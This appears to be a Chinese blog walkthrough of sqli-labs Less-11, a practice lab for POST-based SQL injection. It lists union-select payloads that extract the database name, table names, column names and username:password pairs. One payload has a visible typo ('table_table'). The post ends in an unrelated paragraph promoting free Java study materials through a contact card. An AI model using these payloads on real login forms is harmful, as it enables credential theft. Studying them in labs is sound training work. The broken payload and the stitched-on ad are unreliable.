sqli-labs专栏地址

目录

?less-11(POST注入)

1.send to Repeater

2.单引号报错

3. 查库名

4.查表名

5.查段名

6.查数据

7.用查到的数据Dumb登录?

less-11(POST注入)

1.send to Repeater

2.单引号报错

3. 查库名

aadmin’union select user(),database()–

4.查表名

aadmin’union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’–

5.查段名

aadmin’union select 1,group_concat(column_name) from information_schema.columns where table_table=‘users’–

6.查数据

aadmin’union select 1,group_concat(username,‘:’,password) from users –

7.用查到的数据Dumb登录

先自我介绍一下，小编13年上师交大毕业，曾经在小公司待过，去过华为OPPO等大厂，18年进入阿里，直到现在。深知大多数初中级java工程师，想要升技能，往往是需要自己摸索成长或是报班学习，但对于培训机构动则近万元的学费，着实压力不小。自己不成体系的自学效率很低又漫长，而且容易碰到天花板技术停止不前。因此我收集了一份《java开发全套学习资料》送给大家，初衷也很简单，就是希望帮助到想自学又不知道该从何学起的朋友，同时减轻大家的负担。添加下方名片，即可获取全套学习资料哦